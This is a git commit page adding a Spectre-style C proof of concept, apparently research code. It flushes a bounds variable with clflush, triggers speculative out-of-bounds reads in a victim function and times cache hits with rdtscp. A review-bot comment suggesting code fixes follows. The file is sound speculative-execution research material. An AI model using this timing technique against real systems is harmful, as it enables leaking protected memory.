authorIru Cai <mytbk920423@gmail.com>2019-02-28 17:08:59 +0800
committerIru Cai <mytbk920423@gmail.com>2019-03-20 22:07:22 +0800
commit4f0ae0a1868a02e3d784e0c18eed02cbfdd7b4d6 (patch)
tree3cb7bed188f294c7ce071550c6a24f900f463d9f /attack_code/spectre_rdtscp.c
parent2235ccedc751ccd78ed742081290f8f2fb20ca85 (diff)
attack code and exp scriptis-rebase12
Diffstat (limited to 'attack_code/spectre_rdtscp.c')
-rw-r--r--attack_code/spectre_rdtscp.c77
1 files changed, 77 insertions, 0 deletions
diff --git a/attack_code/spectre_rdtscp.c b/attack_code/spectre_rdtscp.c
new file mode 100644
index 000000000..f4700d2cd
--- /dev/null
+++ b/attack_code/spectre_rdtscp.c
@@ -0,0 +1,77 @@
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <x86intrin.h> /* for rdtscp and clflush */
+
+/********************************************************************
+Victim code.
+********************************************************************/
+unsigned int array1_size = 16;
+uint8_t unused1[64];
+uint8_t array1[640] = {};
+
+uint8_t temp;
+
+void victim_function(size_t x) {
+ if (x < array1_size) {
+ temp &= array1[x];
+ }
+}
+
+/********************************************************************
+Analysis code
+********************************************************************/
+
+size_t malicious_x = 128;//index to array1
+#define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold */
+
+/* Report best guess in value[0] and runner-up in value[1] */
+void testSpec(size_t fetch_index) {
+ int tries, i, j, k, mix_i, junk = 0;
+ register uint64_t time1, time2;
+ volatile uint8_t * addr;
+
+ for (tries = 20; tries > 0; tries--) {
+
+ _mm_clflush( & array1_size); //make branch resolved sloowly
+ _mm_clflush( array1+malicious_x ); //flush out-of-boundary address
+ _mm_clflush( array1+fetch_index ); //flush within-boundary address
+
+ for (volatile int z = 0; z < 1000; z++) {} /* Delay (can also mfence) */
+
+ /*fetch one element in the array*/
+ victim_function(fetch_index);
+
+
+ for (volatile int z = 0; z < 1000; z++) {} /* Delay (can also mfence) */
+
+ time1 = __rdtscp( &junk );
+ time1 = __rdtscp( &junk );
+
+ addr = array1 + malicious_x;
+ junk = * addr; // MEMORY ACCESS TO TIME
+
+ time2 = __rdtscp( &junk ) - time1; // READ TIMER & COMPUTE ELAPSED TIME
+ time2 = __rdtscp( &junk ) - time1; // READ TIMER & COMPUTE ELAPSED TIME
+
+
+ printf("time = %ld\n", time2);
+ }
+}
+
+
+
+int main(int argc, const char * * argv) {
+
+ printf("malicious_x = %p... ", (void * ) malicious_x);
+
+ printf("fetch 0th element, \nno misprediction, \nsuppose to see miss + no squash\n");
+ testSpec(0);
+
+ printf("fetch malicious_x, \nmispredict with speculative load, \nsuppose to see hit + squash\n");
+ testSpec(malicious_x);
+
+ printf("fetch malicious_x * 2, \nmispredict with speculative load different address, \nsuppose to see miss + squash\n");
+ testSpec(malicious_x*2);
+ return (0);
+}
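Review bot: The `printf("time = %ld\n", time2);` call in testSpec passes a `uint64_t` to `%ld`, which is a format/argument mismatch wherever `long` is not 64 bits; include `<inttypes.h>` and write `printf("time = %" PRIu64 "\n", time2);`. In the same function `junk` is declared `int` while `__rdtscp` takes an `unsigned int *`, so it should be `unsigned int junk = 0;`. The comment above testSpec (`Report best guess in value[0] and runner-up in value[1]`) does not describe a function that only prints timings; I would replace it with `/* Flush the lines, call victim_function(fetch_index), then print the rdtscp-timed latency of one load from array1[malicious_x]; repeated 20 times. */`. The locals `i, j, k, mix_i` and the macro `CACHE_HIT_THRESHOLD` are never used in this file and can be dropped, and the doubled `__rdtscp` reads deserve a one-line comment saying whether the repeat is intentional, since the second read overwrites the first and its own latency ends up in the printed value.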